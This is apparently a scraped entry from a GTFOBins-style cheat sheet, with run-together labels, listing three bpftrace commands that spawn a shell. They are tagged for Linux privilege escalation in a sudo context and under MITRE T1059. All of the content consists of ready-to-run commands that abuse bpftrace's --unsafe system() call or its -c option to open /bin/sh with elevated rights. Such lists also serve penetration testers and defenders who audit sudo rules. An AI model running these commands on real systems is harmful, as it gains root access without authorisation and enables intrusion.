shell ExecutionPrivilege Escalation Linux bpftrace --unsafe -e 'BEGIN {system("/bin/sh 1<&0");exit()}' copy Contextsudo Nativeshell MITRET1059 Refsgtfobins.github.io/gtfobins/bpftrace/
shell ExecutionPrivilege Escalation Linux echo 'BEGIN {system("/bin/sh 1<&0");exit()}' >/path/to/temp-file bpftrace --unsafe /path/to/temp-file copy Contextsudo Nativeshell MITRET1059 Refsgtfobins.github.io/gtfobins/bpftrace/
shell ExecutionPrivilege Escalation Linux bpftrace -c /bin/sh -e 'END {exit()}' copy Contextsudo Nativeshell MITRET1059 Refsgtfobins.github.io/gtfobins/bpftrace/